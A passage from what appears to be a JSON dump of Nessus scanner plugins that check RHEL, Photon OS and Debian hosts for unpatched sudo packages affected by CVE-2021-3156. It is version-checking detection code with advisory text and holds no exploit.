'rhel-7-server-eus-rpms',\n 'rhel-7-server-eus-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-eus-source-rpms',\n 'rhel-7-server-eus-source-rpms__7_DOT_7__x86_64',\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-optional-debug-rpms',\n 'rhel-7-server-tus-optional-rpms',\n 'rhel-7-server-tus-optional-source-rpms',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-source-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-debug-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-source-rpms',\n 'rhel-ha-for-rhel-7-server-eus-debug-rpms',\n 'rhel-ha-for-rhel-7-server-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-eus-rpms',\n 'rhel-ha-for-rhel-7-server-eus-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-eus-source-rpms',\n 'rhel-ha-for-rhel-7-server-eus-source-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-tus-debug-rpms',\n 'rhel-ha-for-rhel-7-server-tus-rpms',\n 'rhel-ha-for-rhel-7-server-tus-source-rpms',\n 'rhel-rs-for-rhel-7-server-eus-debug-rpms',\n 'rhel-rs-for-rhel-7-server-eus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-rs-for-rhel-7-server-eus-rpms',\n 'rhel-rs-for-rhel-7-server-eus-rpms__7_DOT_7__x86_64',\n 'rhel-rs-for-rhel-7-server-eus-source-rpms',\n 'rhel-rs-for-rhel-7-server-eus-source-rpms__7_DOT_7__x86_64'\n ],\n 'rhel_tus_7_7_server': [\n 'rhel-ha-for-rhel-7-server-tus-debug-rpms',\n 'rhel-ha-for-rhel-7-server-tus-debug-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-tus-rpms',\n 'rhel-ha-for-rhel-7-server-tus-rpms__7_DOT_7__x86_64',\n 'rhel-ha-for-rhel-7-server-tus-source-rpms',\n 'rhel-ha-for-rhel-7-server-tus-source-rpms__7_DOT_7__x86_64'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n 
if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0222');\n}\n\npkgs = [\n {'reference':'sudo-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'s390', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']},\n {'reference':'sudo-devel-1.8.23-4.el7_7.3', 'sp':'7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_7_7_server', 'rhel_eus_7_7_computenode', 'rhel_eus_7_7_server', 'rhel_tus_7_7_server']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if 
(!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T09:11:34", "description": "An update of the sudo package has been released.", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-29T00:00:00", "title": "Photon OS 1.0: Sudo PHSA-2021-1.0-0358", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-29T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:sudo", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0358_SUDO.NASL", "href": "https://www.tenable.com/plugins/nessus/145699", "sourceData": "##\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0358. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145699);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n\n script_name(english:\"Photon OS 1.0: Sudo PHSA-2021-1.0-0358\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the sudo package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-358.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'sudo-1.9.5-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0227 advisory.\n\n - sudo: Heap buffer overflow in argument parsing 
(CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-28T00:00:00", "title": "RHEL 6 : sudo (RHSA-2021:0227)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-28T00:00:00", "cpe": ["cpe:/o:redhat:rhel_els:6", "p-cpe:/a:redhat:enterprise_linux:sudo-devel", "p-cpe:/a:redhat:enterprise_linux:sudo"], "id": "REDHAT-RHSA-2021-0227.NASL", "href": "https://www.tenable.com/plugins/nessus/145536", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0227. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145536);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0227\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 6 : sudo (RHSA-2021:0227)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0227 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0227\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 
2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_els_6': [\n 'rhel-6-for-system-z-els-debug-rpms',\n 'rhel-6-for-system-z-els-debug-rpms__s390x',\n 'rhel-6-for-system-z-els-optional-debug-rpms',\n 'rhel-6-for-system-z-els-optional-debug-rpms__s390x',\n 'rhel-6-for-system-z-els-optional-rpms',\n 'rhel-6-for-system-z-els-optional-rpms__s390x',\n 'rhel-6-for-system-z-els-optional-source-rpms',\n 'rhel-6-for-system-z-els-optional-source-rpms__s390x',\n 'rhel-6-for-system-z-els-rpms',\n 'rhel-6-for-system-z-els-rpms__s390x',\n 'rhel-6-for-system-z-els-source-rpms',\n 'rhel-6-for-system-z-els-source-rpms__s390x',\n 'rhel-6-server-els-debug-rpms',\n 'rhel-6-server-els-debug-rpms__i386',\n 'rhel-6-server-els-debug-rpms__x86_64',\n 'rhel-6-server-els-optional-debug-rpms',\n 
'rhel-6-server-els-optional-debug-rpms__i386',\n 'rhel-6-server-els-optional-debug-rpms__x86_64',\n 'rhel-6-server-els-optional-rpms',\n 'rhel-6-server-els-optional-rpms__i386',\n 'rhel-6-server-els-optional-rpms__x86_64',\n 'rhel-6-server-els-optional-source-rpms',\n 'rhel-6-server-els-optional-source-rpms__i386',\n 'rhel-6-server-els-optional-source-rpms__x86_64',\n 'rhel-6-server-els-rpms',\n 'rhel-6-server-els-rpms__i386',\n 'rhel-6-server-els-rpms__x86_64',\n 'rhel-6-server-els-source-rpms',\n 'rhel-6-server-els-source-rpms__i386',\n 'rhel-6-server-els-source-rpms__x86_64'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0227');\n}\n\npkgs = [\n {'reference':'sudo-1.8.6p3-29.el6_10.4', 'cpu':'i686', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-1.8.6p3-29.el6_10.4', 'cpu':'s390x', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-1.8.6p3-29.el6_10.4', 'cpu':'x86_64', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'i686', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'s390', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n {'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'s390x', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']},\n 
{'reference':'sudo-devel-1.8.6p3-29.el6_10.4', 'cpu':'x86_64', 'release':'6', 'el_string':'el6_10', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_els_6']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T09:48:39", "description": "The Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super\nuser privileges to specific users. Any local user (sudoers and\nnon-sudoers) can exploit this flaw for root privilege escalation.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.8.19p1-2.1+deb9u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/sudo\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "Debian DLA-2534-1 : sudo security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:sudo-ldap", "p-cpe:/a:debian:debian_linux:sudo", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2534.NASL", "href": "https://www.tenable.com/plugins/nessus/145475", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2534-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145475);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"Debian DLA-2534-1 : sudo security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super\nuser privileges to specific users. Any local user (sudoers and\nnon-sudoers) can exploit this flaw for root privilege escalation.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.8.19p1-2.1+deb9u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/sudo\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/sudo\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/sudo\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected sudo, and sudo-ldap packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sudo-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"sudo\", reference:\"1.8.19p1-2.1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"sudo-ldap\", reference:\"1.8.19p1-2.1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T09:11:35", "description": "An update of the sudo package has been released.", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-29T00:00:00", "title": "Photon OS 2.0: Sudo PHSA-2021-2.0-0315", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-29T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:sudo", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2021-2_0-0315_SUDO.NASL", "href": "https://www.tenable.com/plugins/nessus/145695", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0315. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145695);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n\n script_name(english:\"Photon OS 2.0: Sudo PHSA-2021-2.0-0315\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the sudo package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-315.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 